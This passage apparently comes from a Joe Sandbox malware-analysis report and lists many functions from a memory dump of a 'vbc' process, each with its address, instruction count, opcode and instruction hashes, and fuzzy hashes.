                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e230cdc5d2b9032468f79be610ca87fa90dec5c56b62493726496778f5453ea4
                            • Instruction ID: e208f46d788b4328d5b203a7021ad004ff9372888ae2aa529b864b111d8ec916
                            • Opcode Fuzzy Hash: e230cdc5d2b9032468f79be610ca87fa90dec5c56b62493726496778f5453ea4
                            • Instruction Fuzzy Hash: 3331B336E0012CDBDB36DA14CC41FEEB7BEAB05750F0106E1EA65A7290D7B49F808E91
                            Function 0515C156 Relevance: .1, Instructions: 88COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d74cc33dae706655ec88abc44b21330977c9702c651f62c0229606fa71f007a2
                            • Instruction ID: 30edd8ef6f1df642423022e381ca32f7de03df8b4f47f33a6e9b6a3570fefcbb
                            • Opcode Fuzzy Hash: d74cc33dae706655ec88abc44b21330977c9702c651f62c0229606fa71f007a2
                            • Instruction Fuzzy Hash: 603129B56003008BD729AF28D889BF977B5FF40318F9481A9DC469B382DB749986CB90
                            Function 05194588 Relevance: .1, Instructions: 87COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                            • Instruction ID: 8d434330417c06855abc8bf42267846c29e2e6904dfe650202e1057c74c4426a
                            • Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                            • Instruction Fuzzy Hash: F5219172B00648EBCF19CF58C984A9EB7B5FF48310F108169ED159B241D7B0EA46CB90
                            Function 051944B0 Relevance: .1, Instructions: 87COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 00099944d21a6da945d2c0a5bb698e4890a71a578038d4d2811dba6f099dc2bc
                            • Instruction ID: daca7e9c25f31067669c089fc942cc8734d47e8a92c3736bd27ac9c37abc2825
                            • Opcode Fuzzy Hash: 00099944d21a6da945d2c0a5bb698e4890a71a578038d4d2811dba6f099dc2bc
                            • Instruction Fuzzy Hash: 8C21E3326047459BDF25DF58C840B6BB7E5FF88720F014919FC559B241C7B0E902CBA2
                            Function 051DE609 Relevance: .1, Instructions: 86COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: fe452163abe6399d35e50aa947cc8564dd77e6a662c7bf2715bc8b07bf02dc25
                            • Instruction ID: 02a2ecbfaefc763f60c5ce975d97f79b86b72bc801120f5faf2ce9b1db20e139
                            • Opcode Fuzzy Hash: fe452163abe6399d35e50aa947cc8564dd77e6a662c7bf2715bc8b07bf02dc25
                            • Instruction Fuzzy Hash: 94318275A00205EFCB18CF58C484DAEB7BAFF84714F158559E8099B391E772FA51CBA0
                            Function 0519D530 Relevance: .1, Instructions: 85COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 70c443bbd36a7165b28702fbfcafedfe25923b6e6a4ccd6a561858585f13500c
                            • Instruction ID: 2ab521c386cb2918290621a381970bbd9144512b9f54e975b6efa17557cc7533
                            • Opcode Fuzzy Hash: 70c443bbd36a7165b28702fbfcafedfe25923b6e6a4ccd6a561858585f13500c
                            • Instruction Fuzzy Hash: EE2105756143449BCB25EF78E948F17BBF9EF44664F410826F91587291EB34E804C7A2
                            Function 05163616 Relevance: .1, Instructions: 84COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6f39d542d96f62f6c6dfe2e248dd60e3e07da501b962cf03eda76aabf2584612
                            • Instruction ID: e1200c9f07787fa25b824a8ac39deef4d71fd8860a594b176d6961233d6c021d
                            • Opcode Fuzzy Hash: 6f39d542d96f62f6c6dfe2e248dd60e3e07da501b962cf03eda76aabf2584612
                            • Instruction Fuzzy Hash: D82128753153549FCB31AF18C948F66BBB2FF80B20F550919E8610B691C770ED54CB92
                            Function 051E06F1 Relevance: .1, Instructions: 79COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: fa310728a59812af43ed10018022cb5cc11e64e38a415f3e48ff95a112de1d7d
                            • Instruction ID: ee7cdf1a8239799ef2e98af50a55bdf90407a61e57ffaf629135966cc7e7d39d
                            • Opcode Fuzzy Hash: fa310728a59812af43ed10018022cb5cc11e64e38a415f3e48ff95a112de1d7d
                            • Instruction Fuzzy Hash: E821A075E00629ABCF14DF59C885ABEB7F4FF48740B510069E541A7240D778AD41CFA0
                            Function 0518F32A Relevance: .1, Instructions: 79COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e1acee25a86a18db778833508db53c8429f7f2c8d9f42c0ea70f9f679245ea3d
                            • Instruction ID: 9fe7de74eb9722921f944baca83c589f9901ba370cf8c1c4fddec9ef9269abd7
                            • Opcode Fuzzy Hash: e1acee25a86a18db778833508db53c8429f7f2c8d9f42c0ea70f9f679245ea3d
                            • Instruction Fuzzy Hash: C7218E722002049FC729EF15C485F76BBAAFF95365F15416EE50A8B391EB70ED02CE94
                            Function 05199660 Relevance: .1, Instructions: 78COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 7f7023dea76fad7b5f8bed15379017187f7e4743baedc72a91aab039b1637689
                            • Instruction ID: e6d6403ced638c21ccd9bbbd52d7da8b8036259b9546459e1a756a24ca11da29
                            • Opcode Fuzzy Hash: 7f7023dea76fad7b5f8bed15379017187f7e4743baedc72a91aab039b1637689
                            • Instruction Fuzzy Hash: C021F431614781DBCF39AA25CC58F36B7B3BF40230F11461DE8624A9E0EB35B841CB62
                            Function 051E019F Relevance: .1, Instructions: 78COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e5dc080d4b1b3176991b73ec1f2a316429f6222f8bda242af7a270045003b3b5
                            • Instruction ID: 648b2957fe9d91ca65d588f802ee082c9b543af3169bb6a9e4b41fe078f6ff49
                            • Opcode Fuzzy Hash: e5dc080d4b1b3176991b73ec1f2a316429f6222f8bda242af7a270045003b3b5
                            • Instruction Fuzzy Hash: F421BC72600A44AFC715DB6CD848F6AB7B8FF48740F140069F805DB691D774ED40CB64
                            Function 051DD0C0 Relevance: .1, Instructions: 73COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a31c2c23b4517fa83190f2f071b075dcb825627450a6f94414447da29f9bb9ec
                            • Instruction ID: 15abaeb2b91033d5ec61129b60dd1a21cc5ff9106a1fbfec0734c448b75e2306
                            • Opcode Fuzzy Hash: a31c2c23b4517fa83190f2f071b075dcb825627450a6f94414447da29f9bb9ec
                            • Instruction Fuzzy Hash: B621F372644704EBD321DF28DC42B5BBBA5FF88760F11062EF9499B3A1D734E90187A9
                            Function 0519A30B Relevance: .1, Instructions: 70COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 39726458ab10f53faf870a7597738c07c13a188b617f883ca8fc9ada8e08bf95
                            • Instruction ID: f9b56c34c450102c7b4869ca2d7aec961bcf9931eaefbc692302f28e7db10efe
                            • Opcode Fuzzy Hash: 39726458ab10f53faf870a7597738c07c13a188b617f883ca8fc9ada8e08bf95
                            • Instruction Fuzzy Hash: FE217C352106009FCB29DF29CD01F56B7F6BF48744F248869A419CBB61E731E946CB94
                            Function 051815A9 Relevance: .1, Instructions: 69COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 29802a1ca24c6965babefc6623953e4fc32110ab479eab20bfca4cc576a297b9
                            • Instruction ID: 92ea2031d34238480ab58fcf9df41cde073ba886dec517cd97227370fe246bc9
                            • Opcode Fuzzy Hash: 29802a1ca24c6965babefc6623953e4fc32110ab479eab20bfca4cc576a297b9
                            • Instruction Fuzzy Hash: B6212372604689DFD726DB99C848F317BEABF00250F0A04E4EC028B292E735DC41CB51
                            Function 0515B765 Relevance: .1, Instructions: 69COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 2d523b61f267164236bc5b26913c34421789dce9a9557d9f7c8fc23df9c92db8
                            • Instruction ID: 8ecb72cd8a2473465c7803d02ac37f1bbfba24e2b15370b04d328879cda59779
                            • Opcode Fuzzy Hash: 2d523b61f267164236bc5b26913c34421789dce9a9557d9f7c8fc23df9c92db8
                            • Instruction Fuzzy Hash: 5521AC72210A00DFC722EF28C945F59B7F5FF08718F244A2DE02687AA2DB39E905DB44
                            Function 05168770 Relevance: .1, Instructions: 68COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d31e78ecafb48128bd4c4058de97730e328d2ca52c4020bb8819f3f019ab71df
                            • Instruction ID: 9ecbf92de9e81a65f24cdd58325dfaae2e9f9fdc4a3a17ab9aea3f0703854265
                            • Opcode Fuzzy Hash: d31e78ecafb48128bd4c4058de97730e328d2ca52c4020bb8819f3f019ab71df
                            • Instruction Fuzzy Hash: F111E332700611EBCB15DF89C4C4A26B7EAFF4A710B19806DED09EF205D7B2E911C791
                            Function 05190124 Relevance: .1, Instructions: 68COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                            • Instruction ID: 8d6726302da7fd7aee90991773b9ca99cc6c1bf2234b71808332e3739db87069
                            • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                            • Instruction Fuzzy Hash: 5511EF73A00614AFEB269B44CC49FAABBB9EF84B50F110029FA008B180D771EE44CB64
                            Function 05163720 Relevance: .1, Instructions: 67COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3486fc9544ff813866453d18fee3bacc86849f6a1c983c93ffa8a9e3a9cfe200
                            • Instruction ID: 730ad30cfb672f6b83358e23f4f6d95acaa94c2a579061a3961771c90e1f1b07
                            • Opcode Fuzzy Hash: 3486fc9544ff813866453d18fee3bacc86849f6a1c983c93ffa8a9e3a9cfe200
                            • Instruction Fuzzy Hash: 4921F675A042098BEB15EF6DD0487EEB7B4FF88318F298428D823572D0CBB89995C755
                            Function 051680E9 Relevance: .1, Instructions: 66COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 9b7232417db57011e5419453f32789fb358cbdd9ac2e53efe2df12d5fca174ed
                            • Instruction ID: 337c9c9ad429d9e3d6a78e5894d01750c5f4a3aa0284e2e0ae895508fc3b61b5
                            • Opcode Fuzzy Hash: 9b7232417db57011e5419453f32789fb358cbdd9ac2e53efe2df12d5fca174ed
                            • Instruction Fuzzy Hash: 17218175A00209EFCB14CF58C581A6EBBF6FB88314F25416DD105A7350DB71AD16CBD0
                            Function 0519674D Relevance: .1, Instructions: 65COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 442f9e3ed7b0410a5dfd1e6b825b7f32c1703f0ad7e7615909c66e0f51263f9c
                            • Instruction ID: 3376db5b6c75c50d1a6bd30979fea0d791ae6e154a194e3190b755bff5406e46
                            • Opcode Fuzzy Hash: 442f9e3ed7b0410a5dfd1e6b825b7f32c1703f0ad7e7615909c66e0f51263f9c
                            • Instruction Fuzzy Hash: 78214A75614A00EFDB38DF68C881F66B3F9FF84250F50882DE4AAC7251DB70A950CBA0
                            Function 051966B0 Relevance: .1, Instructions: 61COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 895fd906d5618b306df4b051af954918db324724a5a4026af37359435906aee5
                            • Instruction ID: a327727a53404da812c656b8563b28734ca4e7e6634171a80c4b0809083bf056
                            • Opcode Fuzzy Hash: 895fd906d5618b306df4b051af954918db324724a5a4026af37359435906aee5
                            • Instruction Fuzzy Hash: 5211BF7AB11204DBCF2CEF59D584E5ABBF6EF84610B164079E8059B310DB30ED00CBA0
                            Function 051827ED Relevance: .1, Instructions: 58COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 36d5aaf3c711e3045d2f5d4d1c1ed2ab437f95c4b5d7f07c9b1cf4bd3f00a3a6
                            • Instruction ID: 12ce50abc9d17eded6a7dd5386f36d218b728d4986d323305b5b2232073e8657
                            • Opcode Fuzzy Hash: 36d5aaf3c711e3045d2f5d4d1c1ed2ab437f95c4b5d7f07c9b1cf4bd3f00a3a6
                            • Instruction Fuzzy Hash: 70012B79709648AFE73BA26DD848F376BDDEF423A4F0504A4F90187141D725DC00C2A1
                            Function 05164690 Relevance: .1, Instructions: 57COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: edd6ebe091dfb1ef539df9c98e78faf26393033baa3200156b23ad733fbe9b72
                            • Instruction ID: 15318cec120b03c5c556556e1e1e26545f59d5a4a6e13f7d3e2ce50cc3b7e367
                            • Opcode Fuzzy Hash: edd6ebe091dfb1ef539df9c98e78faf26393033baa3200156b23ad733fbe9b72
                            • Instruction Fuzzy Hash: EC110E7A244644AFCF25EF59D8C4F567BAAFB86B65F054119F8048B240C7B0E860CFA1
                            Function 0521D6F0 Relevance: .1, Instructions: 57COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ab5dca7662d95f66bb5cdf7901944074af6dd6205da9398680eb86638002d29b
                            • Instruction ID: a4916a144b8d7c553652990bbb8e8c389ecd8a3923113da6eff51fafc5a0bfec
                            • Opcode Fuzzy Hash: ab5dca7662d95f66bb5cdf7901944074af6dd6205da9398680eb86638002d29b
                            • Instruction Fuzzy Hash: 10015E7971410AEBAB05DBA6DA48DAF7BFDEF95A54F000059AD1593200E770EE02C7A0
                            Function 0518B052 Relevance: .1, Instructions: 57COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0c79ae47c2bc581d3effa8559232484b14f19017bae6f28b08aea90400dc8056
                            • Instruction ID: f4e42b0681b961da15778ac2f5660e6fccc103f2c1b5b890c8526664c4c465fb
                            • Opcode Fuzzy Hash: 0c79ae47c2bc581d3effa8559232484b14f19017bae6f28b08aea90400dc8056
                            • Instruction Fuzzy Hash: 9801F972B083007BD731BBA99C94F7BB7FDEF84614F040469E606C3242E774E9019A21
                            Function 05196620 Relevance: .1, Instructions: 56COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: bcf0b23c82708ccbb93aa3a9b0d1daeaa70c5b77e4e143e86f201712b64c603d
                            • Instruction ID: 2fc296b0b739848b1a4be3109c3b5db9257d2e73954277d139628ca17569e7ec
                            • Opcode Fuzzy Hash: bcf0b23c82708ccbb93aa3a9b0d1daeaa70c5b77e4e143e86f201712b64c603d
                            • Instruction Fuzzy Hash: A211CE72A00754ABDB21DF69C984B5EFBB8FF84750F910459E901A7201DB30AE01CBA0
                            Function 0518E53E Relevance: .1, Instructions: 55COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                            • Instruction ID: 22b479259c0d508346216aec7b2225098f1d5064bd70d4cfc3408b01ebe9c235
                            • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                            • Instruction Fuzzy Hash: 351148353096C59BDB32A728C848F357BEAFB01754F1A00E4ED018B782F329C843CA11
                            Function 05157330 Relevance: .1, Instructions: 55COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 75ec57f4bc683609f4190136577a1fc7afab6f8d58eda064012fa7b92426d752
                            • Instruction ID: 02a2876cb533f931274493830433aceca31ad2997944ab995127046c188120e4
                            • Opcode Fuzzy Hash: 75ec57f4bc683609f4190136577a1fc7afab6f8d58eda064012fa7b92426d752
                            • Instruction Fuzzy Hash: E7119E71610604EFD721CF59C846F6BB7E9FF443A4F014829EE96C7251D735E8408BA0
                            Function 051DE1D0 Relevance: .1, Instructions: 51COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 12bb8bc89c021ea5024d24f37aed19440c75a0b8a3ca08a606ff5b830929057b
                            • Instruction ID: 4bbf50367290f96ce5c2ae6eb4d63b573ee7f001155cab20da9a954e73f3687b
                            • Opcode Fuzzy Hash: 12bb8bc89c021ea5024d24f37aed19440c75a0b8a3ca08a606ff5b830929057b
                            • Instruction Fuzzy Hash: A511AD36241240EFCB26EF18CD94F16B7B8FF44B94F2004A5F9059B662C335ED01CAA0
                            Function 0516208A Relevance: .0, Instructions: 50COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                            • Instruction ID: 239879f53301aa161f46775b3d083b11edea60302b3b932f86149e97068a5722
                            • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                            • Instruction Fuzzy Hash: 750128373002008BEF249A19D884FA67767BFC4700F5649A9EC168F246DBB1C891C790
                            Function 0519E5CF Relevance: .0, Instructions: 49COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ddfb5fb1c8cffa7e154970008053a42ae7f5b55db4b06ff99a4a9d4e4653c968
                            • Instruction ID: 6c4766ae2406a6865e1d166907c7f377ac4b188ae0c13fa06244b1175a3bd5aa
                            • Opcode Fuzzy Hash: ddfb5fb1c8cffa7e154970008053a42ae7f5b55db4b06ff99a4a9d4e4653c968
                            • Instruction Fuzzy Hash: 990184713015447BD711AB7DCD88E57B7BCFF446607100A25B51583552DB34EC02CAA0
                            Function 0515C020 Relevance: .0, Instructions: 49COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                            • Instruction ID: 901e430c9eb76bac9243895d7cc70e76bd324db8c582ff378a1e439eea886b26
                            • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                            • Instruction Fuzzy Hash: A10192362007059BEF36EA65D844FA7B7AAFFC5224F058819E9568B540DBB4E902CB90
                            Function 051A20F0 Relevance: .0, Instructions: 49COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: eb893bf87e23565fe72c119532f385835630223e0e8a9dd64bd92b8e061ab247
                            • Instruction ID: d6cd03691bff8d0706cd6bd5d9320e8050709dae31f52c0292fd5ecf2a52b62f
                            • Opcode Fuzzy Hash: eb893bf87e23565fe72c119532f385835630223e0e8a9dd64bd92b8e061ab247
                            • Instruction Fuzzy Hash: B9116D7AA0020CABDF16EFA4C855EAEBBB6EF44240F004059F91597291DB35AE11CB90
                            Function 0521F5BE Relevance: .0, Instructions: 47COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 756ed964956612fe147bc94f9a404486288c5ffac9c9526e691531ce2b0d0436
                            • Instruction ID: 826256cc058011f2972c9e3e35528dc4985fac8789cb28bfad52f514f0510a16
                            • Opcode Fuzzy Hash: 756ed964956612fe147bc94f9a404486288c5ffac9c9526e691531ce2b0d0436
                            • Instruction Fuzzy Hash: B701B175A10348AFCB04EF69D945FAEBBF8EF44300F004466B914EB281DBB4DA01CB94
                            Function 0521F453 Relevance: .0, Instructions: 47COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 63193d6e62decdfde906c9bd4a272f19b344c0e03f96ceade1445c435ee1e6d0
                            • Instruction ID: fe9f645958f0610c6023a0ea04055aecab2e996b390b3f419cc27be2f94202fb
                            • Opcode Fuzzy Hash: 63193d6e62decdfde906c9bd4a272f19b344c0e03f96ceade1445c435ee1e6d0
                            • Instruction Fuzzy Hash: D5019E75A10348ABCB04EF69D945FAEBBB8EF44310F004066BA14EB281DBB4DA01CB94
                            Function 0519D1D0 Relevance: .0, Instructions: 47COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
